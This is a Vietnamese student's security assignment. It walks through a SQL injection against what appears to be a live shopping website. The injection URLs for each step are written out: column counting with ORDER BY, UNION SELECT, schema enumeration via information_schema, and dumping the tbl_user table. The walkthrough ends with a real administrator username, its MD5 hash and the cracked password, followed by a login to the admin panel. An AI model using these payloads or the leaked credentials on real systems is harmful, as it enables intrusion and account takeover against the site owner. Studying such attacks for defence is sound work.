Bài tập an toàn thông tin mạng
Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (1.8 MB, 12 trang )
HUỲNH QUỐC NHA
LỚP 12TLT.CNTT
MÃ SINH VIÊN: 102120324
WEB HACK : />Trang gốc chọn để hack : />Hình 1 : Trang web gốc
Ta kiểm tra , bằng cách thêm dấu nháy “ ‘ ” sau URL : …. Id=294 : />frame=product_detail&id=294%27
Hình 2 : Kiểm tra trang web lỗi
Bước 2:Đếm số cột dùng order by đế xác định cột. Ban đầu mình thử đoán số column là 1.
Ta nhập vào link sau : />%201
Và kết quả là :
Hình 3 : kết quả bình thường khi thử với “ order by 1 ”
Ta tiếp tục thử với “ order bay 15 ”
Kết quả là :
Hình 4 : kết quả vẩn bình thường khi thử với “ order by 15 ”
Ta tiếp tục thử với “ order by 16 ”
Kết quả là :
Hình 5 : Kết quả lỗi khi thử với “ order by 16 ”
Vậy ta kết luận có 15 cột
Bước 3: Ta sử dụng Union liên kết 2 câu truy vấn, tìm table cần khai thác thông qua
information_schema.Tables
Đầu tiên thực hiện Union
/>%201,%202,%203,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%2015
Ta có kết quả :
Hinh 6: Kết quả khi ta sử dụng Union để tìm ra cột lỗi
Như vậy a đã biết được cột lỗi là cột thứ : 6
Tiếp đến ta sử dụng hàm version() để show ra version .version() đặt ở 1 trong vị trí các column bị lỗi.ở
đây mình đặt ở column số 6
/>%201,%202,3,4,5,%20version(),%207,%208,%209,%2010,%2011,%2012,13,14,15
và ta có kết quả
Hình 7 : Kết quả kiểm tra phiên bản
Vậy ta có kết quả phiên bản là 5.1.73
Bây giờ ta tìm tất cả các Table của database
/>%201,2,3,4,5,group_concat(unhex(hex(table_name))),%207,8,9,10,11,12,13,14,15%20from
%20information_schema.tables
Kết quả là :
Hình 8: Kết quả truy vấn các Table của database
Tất cả các table của Database :
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPL
ICABILITY,COLUMNS,COLUMN_PRIVILEGES,ENGINES,EVENTS,FILES,
GLOBAL_STATUS,GLOBAL_VARIABLES,KEY_COLUMN_USAGE,PARTIT
IONS,PLUGINS,PROCESSLIST,PROFILING,REFERENTIAL_CONSTRAINT
S,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,SESSION_STATUS,SESS
ION_VARIABLES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_P
RIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,gopy,tbl_config,tbl_cont
ent,tbl_content_category,tbl_member,tbl_order,tbl_order_detail,tbl_product,tbl_pr
oduct_category,tbl_product_new,tbl_product_special,tbl_user,tbl_visitor,thongtink
hachhang
Bước 4 trên information_chema.Columns để tìm các COLUMN thuộc table tương ứng bên trên, ở đây
ta chỉ chú ý đến tbl_user , để ta tìm các trường trong bảng này
/>%201,2,3,4,5,%20group_concat(unhex(hex(column_name))),
%207,%208,%209,%2010,%2011,12,13,14,15%20from%20information_schema.columns%20where
%20table_name=0x74626C5F75736572
Kết quả :
Hình 9: Kết quả tìm các trường trong bảng tbl_user
Vậy ta có 3 trường trong bảng này là id,uid,pwd
Bước 5: Vậy là ta có talbe và column cần thiết rôi ta chỉ việc khai thác thông tin ở đây , đó là uid và
pwd .
Lấy thông tin uid và pwd bằng câu truy vấn sau :
/>%201,2,3,4,5,group_concat(uid,0x2f,pwd),7,8,9,10,11,12,13,14,15%20from%20tbl_user%20 %20-
Kết quả :
Hình 10: Kết quả truy vấn uid và pwd
Vậy ta có kết quả là : admin/e3976d13683589d21ed11314e7254778
Nghĩa là uid : admin , pwd : e3976d13683589d21ed11314e7254778 , Ta mã hóa ra : 015243
Vậy ta đã có thông tin đăng nhập quản trị, ta chỉ việc tìm đến và đăng nhập
/>Hình 11 : Trang đăng nhập
Đăng nhập với Username : admin Password : 015243
Nhấn button Đăng Nhập
Và đây là kết quả:
Hình 12 : Trang Quản trị website
